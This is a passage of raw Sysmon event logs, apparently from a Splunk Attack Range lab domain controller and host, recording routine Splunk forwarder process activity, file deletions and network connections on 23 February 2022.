11:26:20.376{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299170Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:20.376{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299169Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:20.376{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299168Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:20.376{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-19DC-6216-7407-000000003802}4888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299167Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:20.376{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-19DC-6216-7407-000000003802}4888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299166Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:20.379{C8EA50B7-19DC-6216-7407-000000003802}4888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299165Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:20.230{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BC15BC64FDEA3177548E72E8CCA3403,SHA256=800DDBCC68AF8E059F7D5718D21AE7535742404FDE236A3FDDD49DF08F1CB3CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299164Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:20.145{C8EA50B7-19DB-6216-7307-000000003802}67563628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000223030Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:21.558{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F70EB59A678C4804EEB19E375E95FA1,SHA256=19FB7780F8C4A3C17158E482BE8D321CF64240DE0565C3FFE802AC97F64A4DE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299189Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:21.245{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51546E81C09DA8735F2A9A3812D7CDC1,SHA256=CA1DC15848E73B06501FF5C0ADAF1707D324A46B543DEDC1C04B3333ED821881,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299188Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:21.061{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-19DD-6216-7507-000000003802}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299187Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:21.061{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-19DD-6216-7507-000000003802}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299186Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:21.061{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299185Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:21.061{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299184Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:21.061{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299183Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:21.061{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299182Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:21.061{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-19DD-6216-7507-000000003802}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299181Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:21.049{C8EA50B7-19DD-6216-7507-000000003802}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223032Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:22.589{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B5975FC41BF42BEC31981A50EC898F7,SHA256=8F670867F7982343B38342699367344FFA53BC8E0901465E04DA8DDD77360834,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299191Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:20.607{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49593-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299190Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:22.260{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=071B653D8A25DED312D742D9825DB637,SHA256=5BCC88C854DF502DCB4C8868C548C99EBBA3AF7617F616142C6563FEDDAAB353,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223031Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:19.640{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51758-false10.0.1.12-8000- 23542300x8000000000000000223033Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:23.605{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F539258188AB00CF4CB193BEF8D1DCCE,SHA256=3498224958CA805B5D118523DCBA62259BC108883FD3BDFEE26A7376E7E1A638,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299192Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:23.290{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7C2558CBEDA360E2948E078902E2945,SHA256=0B4E61D5A85DDD8D645A193BFE0B60C455C088F14490A067D7AE0D3D008A85E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223034Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:24.652{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B60C09DDF47B2C9C9139766EAB5733FD,SHA256=0A71589605586E48FBB8BC96EED0CEBA107284FB606C6EC32CC9A51DAE816559,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299193Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:24.309{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0AA45DCDFF7FC60B3AED0E714D80529,SHA256=F725D3E5C9380761B5E64A1805DDF0E012DD0056AD2C90D6DE3E793641335E5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223035Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:25.886{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62D7F6BAC7B6AC154E292DA8AD6D953F,SHA256=71D0412AD0ED4F86F5756E4E94216DB16692EF3D43C6EAAA18075E5C95E811FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299194Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:25.326{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D146DABD87D3BC2E4344786250E8FB7B,SHA256=689C9886795A19571F21BB86B48B6034E815A3B6CE2E5F0260C8E5A1B82CB70E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299196Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:25.093{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57641- 23542300x8000000000000000299195Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:26.341{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C615F3768CCC488206BA7C7A5A9A82F4,SHA256=F04DFF2D250EC4478E6E644C818B452973C3C22CC3FD9312083AF6F2F456B26E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299199Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:25.103{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49594-false34.117.237.239239.237.117.34.bc.googleusercontent.com443https 354300x8000000000000000299198Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:25.096{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54452- 23542300x8000000000000000299197Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:27.344{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE94676E524A5CF504D3AFAE76F31A81,SHA256=3B0BA2FC9C834FA6407C9452DAEAC61BF70D7F63738860346BD574CF030B9A1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223036Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:27.121{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=554DA3110735A126753D4D267B50262F,SHA256=F4B198856B2E34976CA43349C71D481DC5B01665960864E677A887BF0023B14D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223038Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:25.686{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51759-false10.0.1.12-8000- 23542300x8000000000000000223037Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:28.136{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC48D7FDB5DA87A967666AE118EAED3A,SHA256=F2032B1A23BAD1DF7A6641408B5EB39D28049DD6FFA0B9944DF5D7E583769BB4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299201Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:26.518{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49595-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299200Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:28.358{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D040BE3F08B98AF949CBFA0D47D214F0,SHA256=E06C76B2A3558CA72832A88260874122A4E74E2F81B719544887E09FFA6CFDAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223039Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:29.371{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A512CB6E8CDF832B2774F6FD18F6352D,SHA256=4C84379C7835F723A36C5F4743FB06FC57266C4926A0CE9F26DFCBA3989BCF2F,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000299211Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 